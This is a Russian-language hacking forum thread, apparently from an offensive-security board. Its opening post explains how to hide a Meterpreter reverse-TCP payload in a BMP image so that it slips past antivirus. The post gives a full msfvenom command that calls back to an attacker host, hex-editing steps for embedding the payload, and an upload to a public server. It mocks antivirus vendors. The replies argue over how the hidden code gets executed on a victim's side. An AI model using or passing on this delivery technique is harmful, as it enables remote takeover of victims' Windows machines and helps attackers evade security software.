Статья Злая КАРТИНКА Payload

Всем привет! сегодня я с Вами по делюсь техникой доставки пэйлода не обычным образом а именно через картинку!
Ибо решил я застолбить эту методику первым на русско-говорящем пространстве и кстати приятно читать свои статьи на ХАК-бордах))) Собсна хочу обратится к копиастерам увожаемые Вы хоть источник указывайте где взяли инструкции, а то люди у вас интересуются по подробностям ну, а Вы в свою очередь их игнорите так-как не знаете всех ньансов моих методик!
Приступим, нам понадобится фотошоп по желанию, программа paint эта утилита есть по умолчанию в винде! И великий и могучий "ДРАКОН" kali-linux в нем и сгенерим наш пэйлоад командой:
msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.2 -f num > payload.txt

1.png


как видите у нас получился пэйлод размером 510 байт! Открываем его в текст. редакторе, убираем лишнее с помощью "найти и заменить"

2.png


3.png


4.png

Далее открываем Пайнт в винде и создаем файл .bmp 24-разрядный, размером: длинна 700 высота 2 в пикселях!

Screenshot_8.png



переносим его в кали и открываем утилитой hexeditor : hexeditor <name>.bat
копируем наш сгенереный текст в hex-код картинки!

5.png


6.png

7.png

8.png

смотрим и видим что наша нагрузка успешно телепортировалась в картинку)) Далее я проявил креатив и позитиу, скрестил его в фотошопе с моей "иконой"

Screenshot_9.png

Screenshot_10.png

Screenshot_11.png

Screenshot_12.png


Screenshot_13.png


Следущее что я сделал загрузил свою "злую" картинку на какой то сервак)) то есть на общий доступ.

9.png


допишу как освобожксь... в хату ломится отдел "К")) Колян.. по кличке "сан-техник" Окрестили Мы его так потому что он в молодости ограбил склад с сантехникой, ох как мы тогда гуляли мммм..... как Боги)))

ПС Хочу передать горячий и пламенный привет, труженникам антивирусных компаний смотрите так ребятки, не за брызгайте желчью свои экраны!))))))

продолжение следует!
 
Последнее редактирование:
A

a113

не правильно сфольмулированный вопрос рождает вопрос
А где мой вопрос не правильно сформулирован. я спрашиваю, КАКИМ ОБРАЗОМ КОД В КАРТИНКЕ ВЫПОЛНЯЕТСЯ. Если не знаете ответа и пишите лишь бы написать, лучше так не делать
 
A

a113

описание будет, покажу метепретер сессию но , будет пару, но...
не суть по поводу "НО", они всегда и всюду. и спасибо за интересную статью
[doublepost=1499378109,1499377879][/doublepost]
не я создовал эту тему не мне ее курировать.
зачем тогда вообще что-то писать?
Любая полезная нагрузка запускается после эксплуатации уязвимости))))))))
это ясно, как божий день. и я...я задал КОНКРЕТНЫЙ ВОПРОС "КАК ЗАПУСКАЕТСЯ". не когда, а КАК. Потому что я еще давным давно спрашивал по поводу шелла в картинке. И тут нет уязвимости как таковой, потому что:
активатором выпоняется!спец скрипт!
 
A

a113

Скрипт по вашему не эксплуатирует уязвимость? Пример любая социальная инженерия это эксплуатация уязвимости: человек
скрипт запускает... если скрипт запускает приложение - он не эксплуатирует его... бл*, я не хочу продолжать разговор, потому что он не имеет смысла. эксплуатация уязвимости - это использование незадокументированной особенности приложения, а тут скрипт просто запускает шелл-код. короче, разговор с тобой не самая приятная вещь.
 
  • Нравится
Реакции: Ondrik8

Vertigo

Lex mea est Vulgate Linux
Gold Team
15.02.2017
1 318
3 999
BIT
3
Техника интересная.Парни,не спорьте так горячо,а то как-то не совсем по-джедаивски.
 
  • Нравится
Реакции: Ondrik8
A

a113

эксплуатация уязвимости - это использование незадокументированной особенности приложения что то новенькое, нет я тебе должен разжевать и в рот положить мож давай я за тебя пойду детей делать а ты будешь их растить. не воруженным глазом видно что скрипт долженна стороне жертвы выполнять преобразование цветов в код а затем запуск , не будь скрипт киди сам напиши скрипт))))))))))
короче ясно все... разжевать. Что можно мне разжевать. ты лезешь в ебеня, я без мата уже не могу. он выполняет на стороне клиента, но сука, про какую уязвимость идет речь? если я напишу скрипт , сохраню его в .png, а затем другим скриптом форматну обратно в .py, это мать ее эксплуатация уязвимости? я понимаю, что если бы этот файл при заливке на серв переполнял буфер кучи и код в файле выполнялся непосредственно - вот эксплуатация. Вопрос был в том "КАК", ты же начал х%й пойми о чем говорить.
 

Vertigo

Lex mea est Vulgate Linux
Gold Team
15.02.2017
1 318
3 999
BIT
3
Так,не помиритесь-вызову на помощь Дарт Вейдера )).Вы во что тему превратили,а,киберхулиганьё))?
Не,ну серьёзно,завязывайте ,друзья.Нечего ругаться.
 

Chelskiy

One Level
02.01.2017
4
7
BIT
0
Покрасил в ячейке текст в зеленый цвет только в каком формате сохранить?

EKRANAOT2017-07-0707-56-49ad35d.png
Не нужно вестись на такие советы, лучше перечитай ещё раз мануал и обрати внимание на 3,4 скриншот и попытайся понять какие знаки автор заменил в playload.txt, как только разберёшься у тебя всё получится. Этот irbis-ru не хороший чел или просто устал от таких как ты.
 
  • Нравится
Реакции: valerian38 и Ondrik8

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 188
BIT
0
Результат тот жи код разбросан

EKRANAOT2017-07-0706-38-17b57f2.png
[doublepost=1499381414,1499381340][/doublepost]
БРО! ЖМУ РУКУ! ТЫ сделал мой день!
Вот это рвение и задор, есть чему по учится...
Базара нет, УДИВИЛ!

Не моу понять одного, что тебя по будило выбрать именно зеленый цвет?
 
Последнее редактирование:
  • Нравится
Реакции: Partiizan и Vander
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!